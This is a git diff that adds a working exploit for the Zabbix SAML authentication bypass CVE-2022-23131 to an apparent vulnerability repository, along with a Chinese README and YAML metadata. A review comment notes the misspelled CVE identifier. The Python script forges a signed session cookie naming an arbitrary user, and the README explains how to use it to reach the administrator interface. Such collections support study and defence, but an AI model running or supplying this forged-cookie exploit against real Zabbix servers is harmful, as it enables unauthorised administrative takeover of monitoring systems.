diff --git a/cve/zabbix/2022/CVE-2022-23131/CVE-2022-231231.py b/cve/zabbix/2022/CVE-2022-23131/CVE-2022-231231.py
new file mode 100644
index 0000000000000000000000000000000000000000..881c7d68b81161bb0d8019c5d8808a25e8231542
--- /dev/null
+++ b/cve/zabbix/2022/CVE-2022-23131/CVE-2022-231231.py
@@ -0,0 +1,37 @@
+import requests
+import re
+import urllib.parse
+import base64
+import json
+import sys
+
+def exp(target, username):
+ resp = requests.get(url=target, verify=False)
+ cookie = resp.headers.get("Set-Cookie")
+
+ zbx_session = re.findall(r"zbx_session=(.*?); ", cookie)
+
+ url_decode_data = urllib.parse.unquote(zbx_session[0], encoding='utf-8')
+ base64_decode_data = base64.b64decode(url_decode_data)
+
+ decode_to_str = str(base64_decode_data, encoding='utf-8')
+
+ to_json = json.loads(decode_to_str)
+
+ tmp_ojb = dict(saml_data=dict(username_attribute=username), sessionid=to_json["sessionid"], sign=to_json["sign"])
+
+ payloadJson = json.dumps(tmp_ojb)
+ print("decode_payload:", payloadJson)
+
+ payload = urllib.parse.quote(base64.b64encode(payloadJson.encode()))
+ print("zbx_signed_session:", payload)
+
+
+if __name__ == "__main__":
+ if len(sys.argv) != 3:
+ print("argv error")
+ exit(0)
+ target = sys.argv[1]
+ username = sys.argv[2]
+
+ exp(target, username)
\ No newline at end of file
diff --git a/cve/zabbix/2022/CVE-2022-23131/README.md b/cve/zabbix/2022/CVE-2022-23131/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..bd13b10a9cf767ecd0547743377efcdb764b7310
--- /dev/null
+++ b/cve/zabbix/2022/CVE-2022-23131/README.md
@@ -0,0 +1,4 @@
+CVE-2022-23131
+使用方式:python3 CVE-2022-23131.py target Admin
+其中,target为目标地址 Admin固定为管理员用户名。将生成的zbx_signed_session替换到当前目标的cookie中 点击登陆页面的sign in with Single Sign-On (SAML)方式登陆,即可直接进入管理界面
+
diff --git a/cve/zabbix/2022/yaml/CVE-2022-231231.yaml b/cve/zabbix/2022/yaml/CVE-2022-231231.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..2dd6e8071950ff964a4bc45b94645fd5f3f82ef9
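Review bot: The new script is committed as `CVE-2022-231231.py`, and the yaml added in the next hunk sets `id: CVE-2022-231231` and `cve-id: CVE-2022-231231`, while its own directory, the README and the NVD reference URL in that same yaml all say CVE-2022-23131; the identifier carries an extra digit and will not cross-reference with the rest of the index. The same misspelling goes into other_list.yaml (`- CVE-2022-231231`), and the README tells the user to run `CVE-2022-23131.py`, which does not match the committed file name, so the file, the two yaml fields and the list entry should all read `CVE-2022-23131`. In the script's `__main__` branch the usage error exits with success, `exit(0)`; since `sys` is already imported, `sys.exit(1)` gives callers a meaningful status.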
--- /dev/null
+++ b/cve/zabbix/2022/yaml/CVE-2022-231231.yaml
@@ -0,0 +1,20 @@
+id: CVE-2022-231231
+source:
+ https://github.com/L0ading-x/cve-2022-23131
+info:
+ name: Zabbix 是由 Alexei Vladishev 开发的一种网络监视、管理系统,基于 Server-Client 架构。可用于监视各种网络服务、服务器和网络机器等状态。
+ severity: critical
+ description: 在启用 SAML SSO 身份验证(非默认)的情况下,恶意行为者可以修改会话数据,因为存储在会话中的用户登录未经过验证。恶意的未经身份验证的参与者可能会利用此问题来提升权限并获得对 Zabbix Frontend 的管理员访问权限。要执行攻击,需要启用 SAML 身份验证,并且攻击者必须知道 Zabbix 用户的用户名(或使用默认情况下禁用的来宾帐户)。
+ scope-of-influence:
+ Zabbix 5.4.0 – 5.4.8; Zabbix 6.0.0alpha1
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-23131
+ - https://www.secpulse.com/archives/179601.html
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2022-231231
+ cwe-id: CWE-290
+ cnvd-id: None
+ kve-id: None
+ tags: 前端认证绕过漏洞
\ No newline at end of file
diff --git a/other_list.yaml b/other_list.yaml
index 8f7ee8353f76c96f302356cad99b94a9239dfcc9..faf9a7b2b18725dadd07b2608cfd78ce876b2784 100644
--- a/other_list.yaml
+++ b/other_list.yaml
@@ -41,4 +41,6 @@ cve:
 - CVE-2023-28432
 Node.js:
 - CVE-2021-21315
+ zabbix:
+ - CVE-2022-231231
 cnvd: